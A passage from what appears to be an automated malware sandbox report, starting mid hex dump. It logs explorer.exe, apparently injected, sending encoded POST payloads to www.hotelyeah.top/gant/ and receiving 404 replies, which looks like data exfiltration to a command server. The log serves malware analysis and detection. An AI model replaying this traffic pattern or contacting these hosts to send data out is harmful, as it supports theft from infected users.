6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                                                  Feb 13, 2023 19:02:13.329691887 CET947INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                                                  Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>


                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                  37192.168.11.204988275.102.22.16880C:\Windows\explorer.exe
                                                                                                                  TimestampkBytes transferredDirectionData
                                                                                                                  Feb 13, 2023 19:02:15.902187109 CET952OUTPOST /gant/ HTTP/1.1
                                                                                                                  Host: www.hotelyeah.top
                                                                                                                  Connection: close
                                                                                                                  Content-Length: 51816
                                                                                                                  Cache-Control: no-cache
                                                                                                                  Origin: http://www.hotelyeah.top
                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                                  Accept: */*
                                                                                                                  Referer: http://www.hotelyeah.top/gant/
                                                                                                                  Accept-Language: en-US
                                                                                                                  Accept-Encoding: gzip, deflate
                                                                                                                  Data Raw: 6a 2d 4a 68 39 50 3d 79 36 47 2d 4d 32 55 48 63 4f 6a 44 58 4c 63 4f 46 33 36 79 5a 32 47 35 52 57 76 6f 6c 69 32 46 4e 70 32 66 72 56 46 44 69 30 38 2d 46 43 28 4c 7a 55 76 48 6b 79 6c 46 36 63 5a 32 30 58 56 63 5a 43 30 52 39 6c 35 49 74 68 78 68 31 79 37 38 53 49 56 44 4a 76 54 61 47 39 6b 50 77 5a 67 78 59 44 6f 67 34 6d 6e 78 46 77 65 4d 69 37 56 58 70 78 35 46 7a 37 79 77 67 53 37 46 6d 57 33 43 68 79 62 78 76 33 61 37 33 55 43 72 63 4c 5a 47 28 61 64 56 55 4e 42 59 67 51 6f 34 46 33 64 49 41 6f 78 61 79 77 6a 72 38 75 69 75 51 58 49 52 54 57 57 58 64 74 39 75 78 5a 63 36 66 30 44 56 6d 4a 38 70 30 4b 42 6c 66 43 72 51 34 70 65 6a 6a 59 4d 43 58 49 59 66 56 53 31 37 58 69 75 51 67 74 79 77 72 36 57 58 4e 5a 34 2d 6b 4d 6d 5a 35 6e 73 66 58 2d 65 59 51 6d 6a 57 6a 4c 72 57 30 56 4a 56 47 38 28 68 61 66 35 47 78 2d 70 44 7e 55 46 54 41 74 48 66 55 43 50 4e 48 54 44 70 4f 34 75 76 64 38 76 6d 31 4f 33 33 4b 7a 79 53 45 6d 48 4c 77 6a 35 48 36 4e 51 52 59 5f 7e 46 38 6e 66 73 30 35 7a 36 54 61 42 52 78 6a 48 48 37 38 41 74 33 7a 65 69 63 33 62 71 78 72 46 4e 33 71 6b 62 79 79 6a 70 69 6c 78 48 71 77 54 2d 63 4f 79 34 30 34 6c 6e 63 6a 7a 4e 79 33 61 77 6e 33 4c 69 6c 47 67 57 68 7a 55 4b 49 31 38 6f 73 31 66 37 5a 44 67 35 53 76 6c 4f 74 37 33 32 46 55 54 37 30 73 6d 6b 6d 58 56 47 36 64 76 66 70 2d 67 76 64 2d 33 53 31 71 41 5a 68 72 72 75 4d 64 38 66 54 77 77 7a 76 43 69 79 73 52 77 77 70 55 36 6e 53 5f 4f 2d 39 45 61 48 70 41 4b 6e 69 77 59 31 65 56 64 73 55 6d 4c 64 4c 73 58 79 72 48 33 42 30 6b 33 41 31 36 4a 38 28 49 6b 71 55 64 63 35 59 47 50 6e 6f 49 32 48 50 74 71 6e 42 6d 50 62 54 37 30 2d 71 6e 77 48 76 4d 41 50 38 6e 46 6c 78 44 59 53 38 51 74 4e 46 78 58 6f 59 57 69 6a 6e 69 42 51 4f 5a 65 7a 58 4d 6b 4d 72 58 4c 71 51 39 66 73 76 55 4e 73 38 4b 6e 61 46 59 47 44 6a 46 67 5f 6c 56 47 64 65 49 7e 69 28 69 6a 38 46 4a 45 47 52 74 79 6f 66 50 31 38 36 67 31 61 69 6f 6f 5a 7a 2d 6a 48 4a 5f 41 37 79 48 71 37 70 30 33 70 4d 50 33 4c 37 73 39 4a 71 4a 69 76 77 2d 6b 39 65 7a 28 53 64 6b 77 31 57 4a 6a 30 7a 55 55 77 53 73 79 49 4a 4d 65 31 30 71 28 4f 4b 63 62 32 74 4d 77 41 34 43 6c 43 38 79 34 53 65 39 53 4f 35 69 75 6f 63 39 35 50 43 76 6c 4b 78 54 4d 50 71 77 79 4b 6f 36 6f 36 54 48 50 6f 52 2d 6b 5f 6c 55 48 53 6f 64 65 62 69 46 6a 74 57 36 46 62 79 39 64 63 47 65 58 4a 77 36 39 73 43 6a 46 64 50 66 55 58 48 72 4f 72 28 74 30 69 65 6d 42 51 62 65 64 75 4f 77 62 52 79 58 4a 55 55 2d 56 68 6b 61 54 56 6c 50 42 64 75 4b 37 33 71 74 38 5a 45 39 71 6d 4c 70 62 52 4a 4b 58 79 72 48 77 51 43 73 48 49 68 32 59 39 31 71 54 77 57 63 39 5f 41 66 58 48 72 6e 34 30 4b 4d 4e 55 65 72 41 65 42 5a 4f 5f 55 32 61 70 51 50 33 73 6e 58 6b 6f 6e 43 4e 66 4a 66 47 75 62 6a 75 44 43 45 49 64 54 49 52 47 37 67 51 70 70 70 42 74 70 71 37 30 63 58 79 62 79 33 43 45 37 4b 4f 6c 6d 51 4c 59 32 4f 34 66 6c 62 63 4e 34 52 66 34 43 66 62 71 57 79 6d 48 57 6d 39 32 55 4b 6b 36 58 5f 42 66 6c 32 6b 73 54 64 30 37 73 48 4a 51 7a 4d 44 70 4f 70 63 4c 50 33 54 6d 77 36 41 4c 77 6a 52 6f 4a 72 52 67 62 6b 44 72 36 70 45 54 58 52 7a 30 44 54 4d 4a 4d 50 51 34 28 43 52 5a 42 30 44 63 76 56 53 38 44 6f 50 38 79 59 62 44 65 70 43 46 50 59 59 6c 39 68 52 49 66 35 54 4f 4e 67 69 7a 47 58 53 36 6e 78 58 47 44 6f 59 42 48 6b 57 74 45 6a 54 4e 4f 77 42 67 41 76 7a 37 56 63 77 67 55 4c 74 55 4b 51 48 55 4a 55 76 64 78 56 38 50 57 4a 7a 48 68 73 65 6c 33 53 5a 4a 44 44 7e 76 6f 4f 32 48 57 4c 65 62 43 4b 46 68 7e 38 4b 58 74 4b 73 2d 31 4f 76 5f 38 4e 32 42 36 45 59 57 33 6e 52 63 58 67 59 7a 56 6b 55 6d 57 4b 52 4b 63 33 66 39 79 41 65 68 6f 46 6f 6e 49 6f 32 62 78 6c 77 47 71 35 34 47 30 5f 37 4d 28 7a 57 6d 74 56 62 5f 74 6b 42 39 7e 6d 47 41 5a 6a 54 66 75 52 59 6e 68 61 35 5f 41 33 31 55 69 75 77 32 44 35 52 36 4e 72 48 43 53 44 65 6e 38 4c 61 63 58 4b 63 64 31 68 4b 6a 64 4c 75 39 34 76 6f 48 78 59 35 37 4a 46 6a 65 43 6f 77 36 6a 46 76 64 76 54 5a 4e 73 51 6a 47 69 69 56 38 6b 67 56 51 70 36 5a 51 65 42 44 56 45 4d 33 6a 59 35 30 61 4e 35 69 37 74 33 52 64 58 4f 48 48 49 2d 54 6a 4c 36 51 62 64 70 76 41 74 45 41 2d 47 54 35 65 33 42 39 5f
                                                                                                                  Data Ascii: j-Jh9P=y6G-M2UHcOjDXLcOF36yZ2G5RWvoli2FNp2frVFDi08-FC(LzUvHkylF6cZ20XVcZC0R9l5Ithxh1y78SIVDJvTaG9kPwZgxYDog4mnxFweMi7VXpx5Fz7ywgS7FmW3Chybxv3a73UCrcLZG(adVUNBYgQo4F3dIAoxaywjr8uiuQXIRTWWXdt9uxZc6f0DVmJ8p0KBlfCrQ4pejjYMCXIYfVS17XiuQgtywr6WXNZ4-kMmZ5nsfX-eYQmjWjLrW0VJVG8(haf5Gx-pD~UFTAtHfUCPNHTDpO4uvd8vm1O33KzySEmHLwj5H6NQRY_~F8nfs05z6TaBRxjHH78At3zeic3bqxrFN3qkbyyjpilxHqwT-cOy404lncjzNy3awn3LilGgWhzUKI18os1f7ZDg5SvlOt732FUT70smkmXVG6dvfp-gvd-3S1qAZhrruMd8fTwwzvCiysRwwpU6nS_O-9EaHpAKniwY1eVdsUmLdLsXyrH3B0k3A16J8(IkqUdc5YGPnoI2HPtqnBmPbT70-qnwHvMAP8nFlxDYS8QtNFxXoYWijniBQOZezXMkMrXLqQ9fsvUNs8KnaFYGDjFg_lVGdeI~i(ij8FJEGRtyofP186g1aiooZz-jHJ_A7yHq7p03pMP3L7s9JqJivw-k9ez(Sdkw1WJj0zUUwSsyIJMe10q(OKcb2tMwA4ClC8y4Se9SO5iuoc95PCvlKxTMPqwyKo6o6THPoR-k_lUHSodebiFjtW6Fby9dcGeXJw69sCjFdPfUXHrOr(t0iemBQbeduOwbRyXJUU-VhkaTVlPBduK73qt8ZE9qmLpbRJKXyrHwQCsHIh2Y91qTwWc9_AfXHrn40KMNUerAeBZO_U2apQP3snXkonCNfJfGubjuDCEIdTIRG7gQpppBtpq70cXyby3CE7KOlmQLY2O4flbcN4Rf4CfbqWymHWm92UKk6X_Bfl2ksTd07sHJQzMDpOpcLP3Tmw6ALwjRoJrRgbkDr6pETXRz0DTMJMPQ4(CRZB0DcvVS8DoP8yYbDepCFPYYl9hRIf5TONgizGXS6nxXGDoYBHkWtEjTNOwBgAvz7VcwgULtUKQHUJUvdxV8PWJzHhsel3SZJDD~voO2HWLebCKFh~8KXtKs-1Ov_8N2B6EYW3nRcXgYzVkUmWKRKc3f9yAehoFonIo2bxlwGq54G0_7M(zWmtVb_tkB9~mGAZjTfuRYnha5_A31Uiuw2D5R6NrHCSDen8LacXKcd1hKjdLu94voHxY57JFjeCow6jFvdvTZNsQjGiiV8kgVQp6ZQeBDVEM3jY50aN5i7t3RdXOHHI-TjL6QbdpvAtEA-GT5e3B9_zrLumolF7hE7k79sfDlsD3eFnZzHpCoD7pN7DBQ-1lAO7yFnFdILmHKW3FmL6ljt64SKsex1NvzhUL7JEuzzCglA10xGslJYa17R6VGVFrI2p6FGZMIBEDU18fy4s9tQeGX0i3031pUVZ45HIxVs6ETxNzcTWREahko5xoqxFPFr~rjAWFsaQcb5VAkkIdP_vMj8S9dGg1i4AZhyLQh8yWZP2TVD5SO_GMGMxT2vVkOuOinq6v0wUJId4WdrDiuqqpInMnw10m2Mj61CsHUyzYpnat2c0JYEZ8iuTLEDU0aNQykbbt0TeIrxhhA8frabci2ygyLRfklwGoWbjkFQy-JQ~dfjkuxhWc7C4dOFL0ii~oHgReob2oSlwnyiXKm9UDLFE-jGoLvV8yUeb5iM3Cy9bgJ3iR0szgZDU67vUodluG6lvkNG(rGvFY5V2bD2dNijJkv-vqj3MyC47N4yqyTF6uRz6NTO2rm_QP8s9elWJrB0Ho1dMMH5hp~vDRm0BCZCLEzNdjB3SWN8tcmYkNq65LZmmQqeNXuRFg8z~0sSReAFuDp9fX1L4W1Fu1BpQ29-xJ7ojmOw2r75NZw-wKRJEn5sl5BCqF4s~wBSePBnBdvu~2Oiqc9-OcelfuH0jpLfR40NVaq2KJGXQqP_Kl1tShus2evjhMXoaiXT3UfwIHDR8DhS6GitkK7GHgiHQ2e2LACdAg62FlFRFv~UFBHgZcnMe2Q4JLRxWiCd5RLO7KKMiuoHtWZtDhQJzLHj6DTmBv2ZaKE-qwWmIlIQ4nsU7MYRsovytICTgvIg4ldG5ymHWFBAOsGnW3AUZs9B4fWMWz2-4PIf3YkplHD8kZZCBXXeNb~13qq_YNzVqCtB1UDJ(jMd4P5wCleJnIUnHEElvvRme5tMh94EQqRa1XQ4lBvDLUIV5EJvvzVXjdfula8e2UAF4Imr9QHWOVIih78gtxdu1e~_fIooq0F6xwwAOD4qGcwyuoRuVSha~07mMp8IRZXnYgYKp_BkxSl4tvE9IUJhY1MxGnzypyfDyCuBdftf9Q~dxwaF4fxZTiq19d(rEDqTqZNKJP6A8G3MUOiJhOsJq2~tezk3OYWFJN7mDtts4rV9uwJbbj5HZFIvWRTw3xMo4TD6VV7WV_H-pQLxeKRA3GZUc_Vby-hjF28r8Pi042ux0QqWscKTU5V8fxt43MuJ21i4h6ht9UiW7MlLYwYtSbU3uuIXT0QeygJd7XSmsgFg55eKAg8oc6tcczdzk0vdSsuqYYojuPx89OoopjGNfYsAxiluTtIBQr9M3ZMol9rShFXQFUZcK6s8OpVabjaiCaWzLxOYheGRtW0zQR4aeRh582PzBK7tYevwJ9tJqs8f1Hj64R89Cuju8Ht-JVqEXdhvbO5gGeuSd2q8vBB_nZW5k6t9GqBvrnBQHpXxbb0jeVOH55dQWtP0znC6Ao~fh6A-iz~Dp75zXGMjbEnuXyucVrvtVBV7wdoq3TjIOLdKniz3jvtsx2KBnWaqTPCfIiMKd4h4hbydkrI6Ei9ug6GATH30clA4RvIJNhdtHVlV3CSQxYvf5vHmPgM7mL~idqRj611Ih76S8iza4AJ2w3R7fOkgzB2_aWL453NVd98XF91xhFmUabO35gMRaZTi6U5wQRJ_fRRQXHNRDxbMTISEckPAIBMkNUlnk2doSrprFxGcElDkR7cTNiptgbKxlqKHHDwWLH36q_Zqk11V2xJGnsnz6Hn_r1sQFFE-DPksBWH5Ex3nS-hRJxceDU0m2MGptbHqCVUHD4HAsiY_2jndf1aj4rhHz9WfgZmFer4neaLQrhVXayWarrumdfscjNKtY3XdRm(tRmMotQ30lBy85L5fQNLo9dywW0LLTI2Daquj8Bv_nRet2lH0PR(bPW4KukuZWVF32a4qB-6Zfdrv4-PzBL1JA9O-oGUz1vqLAS5cxyklbs~iipDWUXlAWLvjgPG8nRavtRiLtxOchZChOfonArAVOw0MTAmuV3SPro4qg4ffwPSqu-xJ2zH9yxZApILZ2yuTzow06Q858b0GFC6YPbAkai7IhJzOiUhwkozMO_OhIdmfUR8P(7yO1CjdyZCr7e0Kcurs5wwgI4KxUcRx8fBJrz2yRNT_tdAHR6pOfjJvyqfbnrxnlEjjtQy5N69mWcmuPf0-AEvuRmp0hMsrCbcD5WJ7L2Dr(dhnDW7FjL~bNFmUVcOfHd(UFO0wFb7PTs3xGX8lddHYwv5PrWC6ijRxXLc1mg8MLW13(A8QkkeBCkpNg65w(D8IXXXp3FNwm7VFiCVznqsfg-mtLHUjwGitnexa12rpm9UT4AFNIx9xzBcJhjvuF0u3eWng0Hc1tBF62v23gchhpdCh(CaZeHQDBSlvoC6eAGhjDXi9pW4EmVxdEfaQhaJ1ZR9FzyjMa4Hen8lL1XaNFX8Qg4ta02JVjjT6I3iNZIA_jZbGItX5~YIahhnHRovDGrrVHYbI4l1mTqh7nHNy4hvttkJcEY5ao7GIByVJW8hqizsa50reQo2-s_Ul9P2u2OGwjFOegsOZRUvBR8k0Cc9lrl47BW5DMJ~Fp6pZSU~p8-x6xhR6fyrf4Y7ylzRC2nueyfppbWkKKSaB6NK1XrL4CJ56EOL9O8H7wPPJFXfOXY3Vptm_ueNkJ4DJB3HQ7YCBxytA9QZ9BrrCpoyQE1TzkFEMSVUGio9I4z~U1A0SxCt
                                                                                                                  Feb 13, 2023 19:02:15.902313948 CET960OUTData Raw: 33 6e 39 6b 63 2d 34 53 4b 4b 70 5a 68 31 58 4c 57 75 47 78 6a 61 70 78 31 36 61 75 44 65 63 52 70 4b 6d 6c 4c 2d 7e 68 4a 42 68 75 43 72 6e 6c 37 6a 55 66 41 68 41 4a 6d 75 79 49 32 56 71 45 74 35 79 54 5a 35 7e 32 72 6a 58 31 41 2d 67 32 76 57
                                                                                                                  Data Ascii: 3n9kc-4SKKpZh1XLWuGxjapx16auDecRpKmlL-~hJBhuCrnl7jUfAhAJmuyI2VqEt5yTZ5~2rjX1A-g2vW3ZXbsZR-T9yTplRw36xMv1YvEH5Sy9QGIoJfhU(975~9NVisOsSw45WAEp7z0Y5dLtnosl7u8bx9SFPZKoYhAxZ0l3Y15BRKOJ7GrlIU8DauEF3Yq23nu_uT9WM2u9HonvhPf7xj(f2kWApkbK7mKUV9QCIoCmyyt
                                                                                                                  Feb 13, 2023 19:02:16.053725958 CET961OUTData Raw: 73 42 71 2d 48 75 38 38 61 6e 58 64 42 76 51 6e 62 70 37 72 67 66 66 64 52 56 6e 33 6b 61 4e 6f 6d 50 73 34 73 44 6d 72 75 54 50 31 70 7a 47 7a 52 4d 36 38 33 61 64 61 52 4e 69 42 7e 54 48 44 5a 62 37 47 61 4e 54 6a 65 52 65 79 7e 47 41 6f 74 5f
                                                                                                                  Data Ascii: sBq-Hu88anXdBvQnbp7rgffdRVn3kaNomPs4sDmruTP1pzGzRM683adaRNiB~THDZb7GaNTjeRey~GAot_8udrmvdBqyB8F5xBniLcfDOQPPyq1qptpz1ge6pUKsApajsb1JbNtmGJxZFOePSW(p~76dP7htFvAt(_NXaddyiWO1c4Ypv79g96nvdBwaW25FlwBEyv(J0EfVI2x_TeMBrsPA5rf-ceOFZJBa86nBblFGtro_L6p
                                                                                                                  Feb 13, 2023 19:02:16.053772926 CET962OUTData Raw: 77 74 37 6d 50 4c 74 6c 32 42 4b 44 39 5f 4c 55 79 67 78 4e 4e 72 61 49 69 58 49 45 7a 6a 4a 54 76 73 35 2d 4d 61 44 36 36 4e 36 79 74 72 7a 39 45 31 38 6d 72 4f 58 37 65 5a 53 64 41 4e 7e 55 76 33 32 52 56 58 7e 2d 38 65 66 76 58 58 66 6b 37 79
                                                                                                                  Data Ascii: wt7mPLtl2BKD9_LUygxNNraIiXIEzjJTvs5-MaD66N6ytrz9E18mrOX7eZSdAN~Uv32RVX~-8efvXXfk7yhLpq7s~k5Tj9q_aMb8we1S1eQQ3PQdYeQ5sXvz0SdvJ4i09JJZT9HOeyUy5XkcLVpC3SFRFRvZZegXJGU-Gb(gQHJTeKmQyNz7A_JGGyKqU2YQPZD9TIOXJDD88GCONBtFOWV13kw-jpK0CQppPPVMBox6WrLQ5tb
                                                                                                                  Feb 13, 2023 19:02:16.054332018 CET964INHTTP/1.1 404 Not Found
                                                                                                                  Connection: close
                                                                                                                  cache-control: private, no-cache, no-store, must-revalidate, max-age=0
                                                                                                                  pragma: no-cache
                                                                                                                  content-type: text/html
                                                                                                                  content-length: 1238
                                                                                                                  date: Mon, 13 Feb 2023 18:02:15 GMT
                                                                                                                  server: LiteSpeed
                                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 31 30 30 25 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 73 68 72 69 6e 6b 2d 74 6f 2d 66 69 74 3d 6e 6f 22 20 2f 3e 0a 3c 74 69 74 6c 65 3e 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 34 34 34 3b 20 6d 61 72 67 69 6e 3a 30 3b 66 6f 6e 74 3a 20 6e 6f 72 6d 61 6c 20 31 34 70 78 2f 32 30 70 78 20 41 72 69 61 6c 2c 20 48 65 6c 76 65 74 69 63 61 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 20 68 65 69 67 68 74 3a 31 30 30 25 3b 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 20 23 66 66 66 3b 22 3e 0a 3c 64 69 76 20 73 74 79 6c 65 3d 22 68 65 69 67 68 74 3a 61 75 74 6f 3b 20 6d 69 6e 2d 68 65 69 67 68 74 3a 31 30 30 25 3b 20 22 3e 20 20 20 20 20 3c 64 69 76 20 73 74 79 6c 65 3d 22 74 65 78 74 2d 61 6c 69 67 6e 3a 20 63 65 6e 74 65 72 3b 20 77 69 64 74 68 3a 38 30 30 70 78 3b 20 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 20 2d 34 30 30 70 78 3b 20 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 20 74 6f 70 3a 20 33 30 25 3b 20 6c 65 66 74 3a 35 30 25 3b 22 3e 0a 20 20 20 20 20 20 20 20 3c 68 31 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 3a 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 35 30 70 78 3b 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 31 35 30 70 78 3b 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 22 3e 34 30 34 3c 2f 68 31 3e 0a 3c 68 32 20 73 74 79 6c 65 3d 22 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 30 70 78 3b 66 6f 6e 74 2d 73 69 7a 65 3a 20 33 30 70 78 3b 22 3e 4e 6f 74 20 46 6f 75 6e 64 0d 0a 3c 2f 68 32 3e 0a 3c 70 3e 54 68 65 20 72 65 73 6f 75 72 63 65 20 72 65 71 75 65 73 74 65 64 20 63 6f 75 6c 64 20 6e 6f 74 20 62 65 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 21 3c 2f 70 3e 0a 3c 2f 64 69 76 3e 3c 2f 64 69 76 3e 3c 64 69 76 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 30 66 30 66 30 3b 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 32 70 78 3b 6d 61 72 67 69 6e 3a 61 75 74 6f 3b 70 61 64 64 69 6e 67 3a 30 70 78 20 33 30 70 78 20 30 70 78 20 33 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 3b 63 6c 65 61 72 3a 62 6f 74 68 3b 68 65 69 67 68 74 3a 31 30 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 31 30 31 70 78 3b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 34 37 34 37 34 37 3b 62 6f 72 64 65 72 2d 74 6f 70 3a 20 31 70 78 20 73 6f 6c 69 64 20 72 67 62 61 28 30 2c 30 2c 30 2c 30 2e 31 35 29 3b 62 6f 78 2d 73 68 61 64 6f 77 3a 20 30 20 31 70 78 20 30 20 72 67 62 61 28 32 35 35 2c 20 32 35 35 2c 20 32 35 35 2c 20 30 2e 33 29 20 69 6e 73 65 74 3b 22 3e 0a 3c 62 72 3e 50 72 6f 75 64 6c 79 20 70 6f 77 65 72 65 64 20 62 79 20 20 3c 61 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 23 66 66 66 3b 22 20 68 72 65 66 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 6c 69 74 65 73 70 65 65 64 74 65 63 68 2e 63 6f 6d 2f 65 72 72 6f 72 2d 70 61 67 65 22 3e 4c 69 74
                                                                                                                  Data Ascii: <!DOCTYPE html><html style="height:100%"><head><meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no" /><title> 404 Not Found</title></head><body style="color: #444; margin:0;font: normal 14px/20px Arial, Helvetica, sans-serif; height:100%; background-color: #fff;"><div style="height:auto; min-height:100%; "> <div style="text-align: center; width:800px; margin-left: -400px; position:absolute; top: 30%; left:50%;"> <h1 style="margin:0; font-size:150px; line-height:150px; font-weight:bold;">404</h1><h2 style="margin-top:20px;font-size: 30px;">Not Found</h2><p>The resource requested could not be found on this server!</p></div></div><div style="color:#f0f0f0; font-size:12px;margin:auto;padding:0px 30px 0px 30px;position:relative;clear:both;height:100px;margin-top:-101px;background-color:#474747;border-top: 1px solid rgba(0,0,0,0.15);box-shadow: 0 1px 0 rgba(255, 255, 255, 0.3) inset;"><br>Proudly powered by <a style="color:#fff;" href="http://www.litespeedtech.com/error-page">Lit
                                                                                                                  Feb 13, 2023 19:02:16.054346085 CET964INData Raw: 65 53 70 65 65 64 20 57 65 62 20 53 65 72 76 65 72 3c 2f 61 3e 3c 70 3e 50 6c 65 61 73 65 20 62 65 20 61 64 76 69 73 65 64 20 74 68 61 74 20 4c 69 74 65 53 70 65 65 64 20 54 65 63 68 6e 6f 6c 6f 67 69 65 73 20 49 6e 63 2e 20 69 73 20 6e 6f 74 20
                                                                                                                  Data Ascii: eSpeed Web Server</a><p>Please be advised that LiteSpeed Technologies Inc. is not a web hosting company and, as such, has no control over content found on this site.</p></div></body></html>
                                                                                                                  Feb 13, 2023 19:02:16.054521084 CET967OUTData Raw: 61 54 68 6d 54 51 7e 4d 4c 4a 69 58 45 34 36 51 61 30 6d 66 37 64 62 4c 68 58 62 56 69 42 7a 30 57 57 44 49 53 49 77 44 6a 76 46 57 47 79 79 55 55 58 76 46 34 51 4d 79 58 77 4b 57 65 47 61 5a 42 4d 75 32 31 46 73 4e 70 64 62 56 41 49 46 75 79 4b
                                                                                                                  Data Ascii: aThmTQ~MLJiXE46Qa0mf7dbLhXbViBz0WWDISIwDjvFWGyyUUXvF4QMyXwKWeGaZBMu21FsNpdbVAIFuyKeIXojm(ZDt9Mub4SoUa0u5Y_CNt6hfGmJvApzqTikECLSs996udIEvZQwILL2oV_BYrvj_Ql4vdj5qxSyl4UoYy-2VdHcYXPBNvFPGit3QAhPTSysZxmhHNVEop12-fSLw~OonweZeXGeHeClMkRKtEiBKNtI_OwX
                                                                                                                  Feb 13, 2023 19:02:16.054570913 CET969OUTData Raw: 68 38 33 58 50 64 72 63 37 36 58 4e 33 6e 79 6b 77 53 61 34 33 34 78 47 39 46 36 74 7e 75 6d 61 4f 36 54 48 35 47 42 32 34 48 78 67 7e 37 47 6f 6d 6a 50 34 41 59 30 54 75 69 77 6c 31 55 38 76 75 72 61 33 7e 32 4a 74 31 63 56 61 53 48 51 5a 75 6f
                                                                                                                  Data Ascii: h83XPdrc76XN3nykwSa434xG9F6t~umaO6TH5GB24Hxg~7GomjP4AY0Tuiwl1U8vura3~2Jt1cVaSHQZuoy_FcjXq5(q(v36O3xh5FTsxoKeTSzM(tX_3GDj29CQhUKcydsM7jh69h3dCPxNr2iDI8ppNzr2K_tIEZN4hCH_WTsjjuWZAhklXYPl9PmstQSDrhQmAxZLVsAolkjb~VwDQ6Zg9sSN3gep(3XYPEiNpmjcGCpXf4I
                                                                                                                  Feb 13, 2023 19:02:16.054641008 CET981OUTData Raw: 4f 71 6a 6b 56 46 6b 72 73 37 70 4c 38 34 47 50 28 4b 45 47 57 55 30 6e 43 6a 32 7a 44 78 54 66 43 32 53 70 61 55 51 35 36 69 49 6e 35 58 74 51 54 69 6b 72 7a 63 4c 52 49 36 4c 68 44 74 70 49 33 53 45 38 63 4e 4a 4e 63 63 65 65 62 77 45 71 67 70
